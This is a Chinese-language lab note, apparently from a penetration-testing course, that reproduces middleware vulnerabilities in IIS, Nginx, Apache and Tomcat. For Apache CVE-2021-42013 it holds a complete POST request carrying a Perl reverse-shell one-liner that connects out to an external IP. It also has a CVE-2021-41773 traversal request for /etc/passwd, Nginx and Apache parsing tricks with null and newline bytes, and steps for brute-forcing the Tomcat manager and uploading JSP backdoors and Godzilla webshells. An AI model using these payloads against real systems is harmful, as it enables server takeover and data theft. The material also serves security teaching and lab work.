一.中間件-IIS-短文件&解析&藍屏
IIS現(xiàn)在用的也少了,漏洞也基本沒啥用
1、短文件:信息收集
2、文件解析:還有點用
3、HTTP.SYS:藍屏崩潰?
?沒有和權(quán)限掛鉤
4、CVE-2017-7269 條件過老
windows 2003上面的漏洞
二.中間件-Nginx-文件解析&命令執(zhí)行等
1. 后綴解析 文件名解析
配置不當:該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當造成的解析漏洞。
這個跟文件上傳類似,找到文件上傳點,上傳png圖片
找到上傳路徑和nginx版本號
查看路徑
添加后綴可以用php執(zhí)行png
在圖片里添加phpinfo執(zhí)行
2. CVE-2013-4547
影響版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
填入phpinfo
在1.jpg后加一個空格
獲得路徑地址
在jpg后加入兩個空格.php
然后切換到Hex頁面
將20? 20? 中后面的20替換為00
成功
3. cve_2021_23017 無 EXP
CVE-2021-23017:nginx DNS解析漏洞PoC公開-騰訊云開發(fā)者社區(qū)-騰訊云 (tencent.com)
4. cve_2017_7529 敏感信息泄露,意義不大
三.中間件-Apache-RCE&目錄遍歷&文件解析等
Apache HTTP Server 是美國阿帕奇(Apache)基金會的一款開源網(wǎng)頁服務(wù)器。該服 務(wù)器具有快速、可靠且可通過簡單的 API 進行擴充的特點,發(fā)現(xiàn) Apache HTTP Server 2.4.50 中針對 CVE-2021-41773 的修復(fù)不夠充分。攻擊者可以使用路徑遍 歷攻擊將 URL 映射到由類似別名的指令配置的目錄之外的文件。如果這些目錄之外的文 件不受通常的默認配置“要求全部拒絕”的保護,則這些請求可能會成功。如果還為這些別 名路徑啟用了 CGI 腳本,則這可能允許遠程代碼執(zhí)行。此問題僅影響 Apache 2.4.49 和 Apache 2.4.50,而不影響更早版本。
1.cve_2021_42013 RCE
監(jiān)聽端口
修改抓包內(nèi)容,用POST提交,下面的是使用棱角社區(qū)生成的perl的反彈shell命令
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'
成功
2.cve_2021_41773 目錄穿越
Apache HTTP Server 2.4.49、2.4.50 版本對路徑規(guī)范化所做的更改中存在一個路 徑穿越漏洞,攻擊者可利用該漏洞讀取到 Web 目錄外的其他文件,如系統(tǒng)配置文件、網(wǎng) 站源碼等,甚至在特定情況下,攻擊者可構(gòu)造惡意請求執(zhí)行命令,控制服務(wù)器。
在Burp中修改:例如獲取/etc/passwd下的目錄信息 /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/ passwd
3、cve-2017-15715
必須是黑名單
修改樣式
在下面的1.php后加一個空格,在Hex對應(yīng)位置改為0a
5、cve-2017-9798
? ? ? ? 信息泄露? 價值不高。
6、cve-2018-11759
????????價值不高。
7、cve-2021-37580
? ? ? ? shenyu 插件問題。
四.中間件-Tomcat-弱口令&文件上傳&文件包含等
1.弱口令
進入頁面,點擊manager或直接url輸入進去登錄頁面
可以爆破
找到文件上傳點,上傳jsp的后門代碼,壓縮為zip后改名后綴war再上傳
訪問該頁面觸發(fā)后門代碼
鏈接
2.cve-2017-12615
put一個1.jsp? ?
訪問地址,再用哥斯拉鏈接就ok,這個后門代碼是剛剛哥斯拉生成的
3.cve-2020-1938
就是一個文件包含漏洞
這里用了一個python3的
dacade/CVE-2020-1938 (github.com)
4.cve-2020-11996
拒絕服務(wù),危害過大
5.cve-2020-9484
反序列化
這啥條件啊,太苛刻了= =文章來源:http://www.zghlxwxcb.cn/news/detail-767064.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-767064.html
到了這里,關(guān)于小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!